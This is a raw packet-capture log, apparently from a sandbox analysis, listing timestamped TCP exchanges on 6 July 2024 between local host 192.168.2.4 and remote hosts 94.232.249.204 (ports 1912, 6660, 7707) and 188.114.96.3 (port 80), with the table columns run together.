                                                                                                                                                                                                                                Jul 6, 2024 13:27:44.201050043 CEST8049793188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:44.201091051 CEST4979380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:44.205940962 CEST8049793188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:44.322031021 CEST497791912192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:44.601025105 CEST497876660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:44.601341009 CEST497946660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:44.606013060 CEST66604978794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:44.606281996 CEST66604979494.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:44.606565952 CEST497946660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:44.606864929 CEST497946660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:44.611752987 CEST66604979494.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:45.047868967 CEST8049793188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:45.048270941 CEST8049793188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:45.048453093 CEST4979380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:45.052416086 CEST4979380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:45.159343004 CEST4979580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:45.171428919 CEST8049795188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:45.171737909 CEST4979580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:45.171914101 CEST4979580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:45.176714897 CEST8049795188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:45.176906109 CEST4979580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:45.181667089 CEST8049795188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:45.972578049 CEST8049795188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:45.973184109 CEST8049795188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:45.973236084 CEST4979580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:45.976244926 CEST4979580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:46.081348896 CEST4979680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:46.086173058 CEST8049796188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:46.086237907 CEST4979680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:46.086304903 CEST4979680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:46.091114044 CEST8049796188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:46.091159105 CEST4979680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:46.097910881 CEST8049796188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:46.267296076 CEST66604979494.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:46.267353058 CEST497946660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:47.019702911 CEST497791912192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:47.024624109 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:47.206533909 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:47.211700916 CEST497791912192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:47.216511965 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:47.394468069 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:47.442182064 CEST497791912192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.036571980 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.775700092 CEST497791912192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.778719902 CEST8049796188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.778737068 CEST8049796188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.778744936 CEST8049796188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.778888941 CEST4979680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.779829025 CEST8049796188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.779970884 CEST4979680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.780510902 CEST8049796188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.780920982 CEST4979680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.782080889 CEST4979680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.782438993 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.782459021 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.782558918 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.789340019 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.794416904 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.894068956 CEST4979880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.898900032 CEST8049798188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.898979902 CEST4979880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.899039984 CEST4979880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.903789043 CEST8049798188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.903901100 CEST4979880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.908714056 CEST8049798188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:48.969544888 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:49.050618887 CEST497791912192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:49.444586992 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:49.444840908 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:49.447741032 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:49.450423002 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:49.455276966 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:49.635654926 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:49.729351997 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:49.763068914 CEST8049798188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:49.763170958 CEST8049798188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:49.763226032 CEST4979880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:49.766524076 CEST4979880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:49.878216982 CEST4979980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:49.884079933 CEST8049799188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:49.884143114 CEST4979980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:49.884185076 CEST4979980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:49.890782118 CEST8049799188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:49.890827894 CEST4979980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:49.895632982 CEST8049799188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:50.251004934 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:50.255959988 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:50.256015062 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:50.261084080 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:50.598746061 CEST8049799188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:50.598977089 CEST8049799188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:50.599375010 CEST4979980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:50.602313995 CEST4979980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:50.706248999 CEST4980080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:50.711143017 CEST8049800188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:50.711307049 CEST4980080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:50.711307049 CEST4980080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:50.717434883 CEST8049800188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:50.717628956 CEST4980080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:50.723659039 CEST8049800188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:50.911712885 CEST497791912192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:50.916646004 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:50.916660070 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:50.916668892 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.182461023 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.187725067 CEST497791912192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.193064928 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.193074942 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.193090916 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.193099976 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.193208933 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.193217993 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.268294096 CEST497946660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.268651962 CEST498016660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.273243904 CEST66604979494.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.273441076 CEST66604980194.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.273539066 CEST498016660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.273883104 CEST498016660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.278660059 CEST66604980194.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.379240036 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.440025091 CEST497791912192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.441332102 CEST8049800188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.441344976 CEST8049800188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.441474915 CEST4980080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.447700977 CEST4980080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.551712990 CEST4980280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.556612015 CEST8049802188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.556746960 CEST4980280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.556829929 CEST4980280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.561647892 CEST8049802188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.561723948 CEST4980280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:51.566498041 CEST8049802188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.260349989 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.313571930 CEST8049802188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.315718889 CEST8049802188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.315764904 CEST4980280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.318010092 CEST4980280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.393193007 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.393240929 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.425030947 CEST4980380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.431430101 CEST8049803188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.431494951 CEST4980380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.431545019 CEST4980380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.437025070 CEST8049803188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.437067986 CEST4980380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.442364931 CEST8049803188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.453406096 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.458256006 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.458302021 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.463112116 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.656900883 CEST497791912192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.661875963 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.661887884 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.661897898 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.661906958 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.661915064 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.661998987 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.662062883 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.662071943 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.662075996 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.662132978 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.666686058 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.666693926 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.666707039 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.666714907 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.909441948 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.909460068 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.909477949 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.909490108 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.909498930 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.909512043 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.909523964 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.909533978 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.909544945 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.909559965 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.909563065 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.909599066 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.909657955 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.910712004 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.910722971 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.910733938 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.910743952 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.910756111 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.910773993 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.910828114 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.916595936 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.916608095 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.916824102 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.929696083 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.943059921 CEST66604980194.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.943221092 CEST498016660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.999910116 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.999932051 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.999949932 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:52.999972105 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.000031948 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.000044107 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.000050068 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.000226021 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.000287056 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.000374079 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.000397921 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.000416040 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.000427961 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.000437021 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.000451088 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.001178980 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.001205921 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.001218081 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.001275063 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.001338959 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.001355886 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.002098083 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.002152920 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.002170086 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.002182007 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.002254963 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.002265930 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.002280951 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.002552986 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.003103018 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.003187895 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.003200054 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.003218889 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.003271103 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.003298044 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.033499956 CEST497791912192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.038487911 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.049379110 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.083895922 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.084135056 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.084146023 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.084222078 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.091331959 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.091373920 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.091384888 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.091451883 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.091461897 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.091461897 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.091466904 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.091651917 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.091655016 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.091686964 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.091697931 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.091801882 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.091813087 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.091830015 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.091855049 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.091907024 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.092525959 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.092572927 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.092586040 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.092633963 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.092710972 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.092721939 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.092734098 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.092762947 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.092880011 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.093432903 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.093498945 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.093511105 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.093601942 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.093615055 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.093657017 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.093686104 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.094135046 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.094377041 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.094422102 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.094434977 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.094540119 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.094551086 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.094561100 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:53.094588041 CEST497977707192.168.2.494.232.249.204
